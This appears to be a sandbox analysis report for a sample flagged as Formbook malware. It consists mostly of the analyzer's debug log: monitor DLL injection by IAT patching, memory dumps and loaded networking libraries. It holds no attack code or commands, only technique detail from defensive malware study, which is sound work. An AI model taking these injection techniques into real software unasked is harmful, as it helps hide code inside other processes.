Detections

Yara:

Formbook

Analysis

Category Package Started Completed Duration Options Log
FILE exe 2020-06-05 13:56:58 2020-06-05 14:03:57 419 seconds Show Options Show Log
route = tor
2020-05-13 09:08:22,211 [root] INFO: Date set to: 20200605T13:45:06, timeout set to: 200
2020-06-05 13:45:06,046 [root] DEBUG: Starting analyzer from: C:\tmpnwhtwc92
2020-06-05 13:45:06,046 [root] DEBUG: Storing results at: C:\IaUfpVzipc
2020-06-05 13:45:06,046 [root] DEBUG: Pipe server name: \\.\PIPE\iUhYvdtt
2020-06-05 13:45:06,046 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-06-05 13:45:06,046 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-05 13:45:06,046 [root] INFO: Automatically selected analysis package "exe"
2020-06-05 13:45:06,046 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-05 13:45:06,093 [root] DEBUG: Imported analysis package "exe".
2020-06-05 13:45:06,093 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-05 13:45:06,093 [root] DEBUG: Initialized analysis package "exe".
2020-06-05 13:45:06,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-05 13:45:06,218 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-05 13:45:06,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-05 13:45:06,421 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-05 13:45:06,421 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-05 13:45:06,687 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-05 13:45:06,703 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-05 13:45:06,703 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-05 13:45:06,703 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-05 13:45:06,859 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-05 13:45:06,859 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-05 13:45:06,859 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-05 13:45:06,859 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-05 13:45:06,953 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-05 13:45:06,953 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-05 13:45:12,265 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-05 13:45:12,312 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-05 13:45:12,343 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-05 13:45:12,343 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-05 13:45:12,343 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-05 13:45:12,343 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-05 13:45:12,343 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-05 13:45:12,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-05 13:45:12,359 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-05 13:45:12,359 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-05 13:45:12,359 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-05 13:45:12,359 [root] DEBUG: Started auxiliary module Browser
2020-06-05 13:45:12,359 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-05 13:45:12,359 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-05 13:45:12,359 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-05 13:45:12,359 [root] DEBUG: Started auxiliary module Curtain
2020-06-05 13:45:12,359 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-05 13:45:12,359 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-05 13:45:12,359 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-05 13:45:12,359 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-05 13:45:12,687 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-05 13:45:12,687 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-05 13:45:12,718 [root] DEBUG: Started auxiliary module DigiSig
2020-06-05 13:45:12,718 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-05 13:45:12,718 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-05 13:45:12,718 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-05 13:45:12,750 [root] DEBUG: Started auxiliary module Disguise
2020-06-05 13:45:12,750 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-05 13:45:12,750 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-05 13:45:12,750 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-05 13:45:12,750 [root] DEBUG: Started auxiliary module Human
2020-06-05 13:45:12,750 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-05 13:45:12,750 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-05 13:45:12,750 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-05 13:45:12,750 [root] DEBUG: Started auxiliary module Procmon
2020-06-05 13:45:12,750 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-05 13:45:12,750 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-05 13:45:12,750 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-05 13:45:12,765 [root] DEBUG: Started auxiliary module Screenshots
2020-06-05 13:45:12,765 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-05 13:45:12,765 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-05 13:45:12,765 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-05 13:45:12,765 [root] DEBUG: Started auxiliary module Sysmon
2020-06-05 13:45:12,765 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-05 13:45:12,765 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-05 13:45:12,765 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-05 13:45:12,765 [root] DEBUG: Started auxiliary module Usage
2020-06-05 13:45:12,765 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-05 13:45:12,765 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-05 13:45:12,765 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-05 13:45:12,765 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-05 13:45:12,875 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe" with arguments "" with pid 5596
2020-06-05 13:45:12,875 [lib.api.process] INFO: Monitor config for process 5596: C:\tmpnwhtwc92\dll\5596.ini
2020-06-05 13:45:12,875 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:13,046 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:13,046 [root] DEBUG: Loader: Injecting process 5596 (thread 5624) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:13,046 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:13,046 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:13,046 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:13,046 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:13,062 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5596
2020-06-05 13:45:15,062 [lib.api.process] INFO: Successfully resumed process with pid 5596
2020-06-05 13:45:16,109 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 13:45:16,109 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 13:45:16,125 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 13:45:16,156 [root] INFO: loaded: b'5596'
2020-06-05 13:45:16,156 [root] INFO: Loaded monitor into process with pid 5596
2020-06-05 13:45:16,156 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,156 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,171 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,171 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,187 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xbc amd local view 0x02F10000 to global list.
2020-06-05 13:45:16,375 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2020-06-05 13:45:16,375 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\system32\SXS (0x5f000 bytes).
2020-06-05 13:45:17,187 [root] DEBUG: DLL loaded at 0x6E160000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-06-05 13:45:17,625 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xec amd local view 0x033B0000 to global list.
2020-06-05 13:45:17,625 [root] DEBUG: DLL loaded at 0x74880000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 13:45:17,640 [root] DEBUG: DLL loaded at 0x74610000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 13:45:17,671 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xf8 amd local view 0x032E0000 to global list.
2020-06-05 13:45:18,484 [root] DEBUG: DLL loaded at 0x74330000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-05 13:45:18,484 [root] DEBUG: DLL unloaded from 0x00400000.
2020-06-05 13:45:27,375 [root] DEBUG: set_caller_info: Adding region at 0x003D0000 to caller regions list (ntdll::LdrLoadDll).
2020-06-05 13:45:27,453 [root] DEBUG: set_caller_info: Adding region at 0x01300000 to caller regions list (kernel32::GetSystemTime).
2020-06-05 13:45:27,468 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1300000
2020-06-05 13:45:27,468 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_11332322842725135562020', b'9;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?0x01300000;?', ['5596'], 'CAPE')
2020-06-05 13:45:27,515 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\IaUfpVzipc\CAPE\5596_11332322842725135562020 (size 0xfe8)
2020-06-05 13:45:27,515 [root] DEBUG: DumpRegion: Dumped stack region from 0x01300000, size 0x1000.
2020-06-05 13:45:27,531 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_15924564372725135562020', b'9;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?0x003D0000;?', ['5596'], 'CAPE')
2020-06-05 13:45:27,546 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\IaUfpVzipc\CAPE\5596_15924564372725135562020 (size 0x32ef)
2020-06-05 13:45:27,546 [root] DEBUG: DumpRegion: Dumped stack region from 0x003D0000, size 0x8000.
2020-06-05 13:45:29,937 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:29,937 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:29,953 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:29,968 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:29,968 [root] DEBUG: Loader: Injecting process 5848 (thread 5904) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:29,968 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:29,968 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:29,984 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:29,984 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:29,984 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5848
2020-06-05 13:45:30,015 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:30,015 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:30,015 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:30,031 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:30,031 [root] DEBUG: Loader: Injecting process 5848 (thread 5904) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,031 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:30,031 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,031 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:30,046 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,046 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5848
2020-06-05 13:45:30,046 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:30,046 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:30,046 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:30,062 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:30,062 [root] DEBUG: Loader: Injecting process 5848 (thread 0) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,062 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7FFDF000 Local PEB 0x7FFDF000 Local TEB 0x7FFDC000: The operation completed successfully.
2020-06-05 13:45:30,062 [root] DEBUG: Error 299 (0x12b) - GetProcessInitialThreadId: Failed to read from process: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
2020-06-05 13:45:30,062 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed (SessionId=1).
2020-06-05 13:45:30,062 [root] DEBUG: Failed to inject DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,078 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 5848, error: 4294967281
2020-06-05 13:45:30,078 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_10994882302026135562020', b'4;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?5848;?', ['5596'], 'CAPE')
2020-06-05 13:45:30,093 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:30,093 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:30,093 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:30,109 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:30,109 [root] DEBUG: Loader: Injecting process 5848 (thread 0) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,109 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7FFDF000 Local PEB 0x7FFDE000 Local TEB 0x7FFDF000: The operation completed successfully.
2020-06-05 13:45:30,109 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 5904, handle 0xa4
2020-06-05 13:45:30,109 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:30,109 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C8)
2020-06-05 13:45:30,109 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,125 [root] DEBUG: InjectDllViaIAT: Memory region at 0x07000000 not empty.
2020-06-05 13:45:30,125 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:30,125 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,125 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5848
2020-06-05 13:45:30,125 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:30,125 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:30,125 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:30,140 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:30,140 [root] DEBUG: Loader: Injecting process 5848 (thread 5904) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,140 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:30,140 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C8)
2020-06-05 13:45:30,140 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,140 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:30,140 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,140 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5848
2020-06-05 13:45:30,156 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_16872639682026135562020', b'3;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?5848;?', ['5596'], 'CAPE')
2020-06-05 13:45:30,249 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_8601623262026135562020', b'3;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?5848;?', ['5596'], 'CAPE')
2020-06-05 13:45:30,359 [root] WARNING: Unable to open termination event for pid 5596.
2020-06-05 13:45:30,375 [root] INFO: ('dump_file', 'C:\\Users\\Rebecca\\AppData\\Local\\Temp\\~DFF51EEFB66773FEBB.TMP', '', False, 'files')
2020-06-05 13:45:30,375 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 13:45:30,375 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 13:45:30,390 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:30,390 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 13:45:30,406 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5848 at 0x6a6b0000, image base 0x400000, stack from 0x126000-0x130000
2020-06-05 13:45:30,406 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe".
2020-06-05 13:45:30,421 [root] INFO: loaded: b'5848'
2020-06-05 13:45:30,421 [root] INFO: Loaded monitor into process with pid 5848
2020-06-05 13:45:30,437 [root] INFO: b'C:\\IaUfpVzipc\\CAPE\\5596_12090969882026135562020|5596|0;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?'
2020-06-05 13:45:30,437 [root] INFO: cape
2020-06-05 13:45:30,437 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_12090969882026135562020', b'0;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?', ['5596'], 'procdump')
2020-06-05 13:45:30,437 [root] DEBUG: set_caller_info: Adding region at 0x00150000 to caller regions list (ntdll::LdrLoadDll).
2020-06-05 13:45:30,453 [root] DEBUG: set_caller_info: Adding region at 0x01490000 to caller regions list (kernel32::GetSystemTime).
2020-06-05 13:45:30,453 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_12090969882026135562020', '', False, 'files')
2020-06-05 13:45:30,453 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\cryptbase (0xc000 bytes).
2020-06-05 13:45:30,468 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1490000
2020-06-05 13:45:30,500 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x01490000 size 0x400000.
2020-06-05 13:45:30,546 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5848_9172732243025135562020', b'9;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?0x01490000;?', ['5848'], 'CAPE')
2020-06-05 13:45:30,578 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\IaUfpVzipc\CAPE\5848_9172732243025135562020 (size 0x5c8)
2020-06-05 13:45:30,578 [root] DEBUG: DumpRegion: Dumped stack region from 0x01490000, size 0x1000.
2020-06-05 13:45:30,578 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5848_1546327143025135562020', b'9;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?0x00150000;?', ['5848'], 'CAPE')
2020-06-05 13:45:30,609 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\IaUfpVzipc\CAPE\5848_1546327143025135562020 (size 0x32ef)
2020-06-05 13:45:30,609 [root] DEBUG: DumpRegion: Dumped stack region from 0x00150000, size 0x100000.
2020-06-05 13:45:31,703 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xbc amd local view 0x753D0000 to global list.
2020-06-05 13:45:31,703 [root] DEBUG: DLL loaded at 0x753D0000: C:\Windows\system32\shell32 (0xc4c000 bytes).
2020-06-05 13:45:31,921 [root] DEBUG: DLL loaded at 0x76160000: C:\Windows\system32\wininet (0x1c4000 bytes).
2020-06-05 13:45:31,953 [root] DEBUG: DLL loaded at 0x751C0000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:31,953 [root] DEBUG: DLL loaded at 0x74FF0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:31,953 [root] DEBUG: DLL loaded at 0x75010000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:31,968 [root] DEBUG: DLL loaded at 0x74330000: C:\Windows\system32\version (0x9000 bytes).
2020-06-05 13:45:31,968 [root] DEBUG: DLL loaded at 0x75000000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-06-05 13:45:31,984 [root] DEBUG: DLL loaded at 0x76AA0000: C:\Windows\system32\normaliz (0x3000 bytes).
2020-06-05 13:45:31,984 [root] DEBUG: DLL loaded at 0x767A0000: C:\Windows\system32\iertutil (0x215000 bytes).
2020-06-05 13:45:31,984 [root] DEBUG: DLL loaded at 0x74FE0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-06-05 13:45:32,000 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-06-05 13:45:32,015 [root] DEBUG: DLL loaded at 0x74E60000: C:\Windows\system32\profapi (0xb000 bytes).
2020-06-05 13:45:32,015 [root] DEBUG: DLL loaded at 0x70E20000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-06-05 13:45:32,031 [root] DEBUG: DLL loaded at 0x74F70000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:32,046 [root] DEBUG: DLL loaded at 0x76480000: C:\Windows\system32\WS2_32 (0x35000 bytes).
2020-06-05 13:45:32,046 [root] DEBUG: DLL loaded at 0x76120000: C:\Windows\system32\NSI (0x6000 bytes).
2020-06-05 13:45:32,062 [root] DEBUG: DLL loaded at 0x6EB20000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-06-05 13:45:32,078 [root] DEBUG: DLL loaded at 0x6EAA0000: C:\Windows\system32\webio (0x50000 bytes).
2020-06-05 13:45:32,078 [root] DEBUG: DLL unloaded from 0x6EB20000.
2020-06-05 13:45:32,093 [root] DEBUG: DLL loaded at 0x73320000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-06-05 13:45:32,093 [root] DEBUG: DLL loaded at 0x73310000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-06-05 13:45:32,109 [root] DEBUG: DLL loaded at 0x74840000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-06-05 13:45:32,125 [root] DEBUG: DLL loaded at 0x69A90000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-06-05 13:45:32,125 [root] DEBUG: DLL loaded at 0x74700000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-06-05 13:45:32,140 [root] DEBUG: DLL loaded at 0x74830000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-06-05 13:45:32,140 [root] DEBUG: DLL loaded at 0x76B50000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-06-05 13:45:32,156 [root] DEBUG: DLL loaded at 0x70370000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-06-05 13:45:32,156 [root] DEBUG: DLL loaded at 0x735C0000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-06-05 13:45:32,171 [root] DEBUG: DLL loaded at 0x730B0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2020-06-05 13:45:32,171 [root] DEBUG: DLL loaded at 0x743C0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-06-05 13:45:32,187 [root] DEBUG: DLL loaded at 0x76CE0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-06-05 13:45:32,187 [root] DEBUG: DLL loaded at 0x73030000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2020-06-05 13:45:32,187 [root] DEBUG: DLL loaded at 0x71530000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-06-05 13:45:32,203 [root] DEBUG: DLL loaded at 0x74880000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 13:45:32,218 [root] DEBUG: DLL loaded at 0x74610000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 13:45:32,218 [root] DEBUG: DLL loaded at 0x74E50000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2020-06-05 13:45:32,281 [root] DEBUG: DLL loaded at 0x6D670000: C:\Windows\System32\npmproxy (0x8000 bytes).
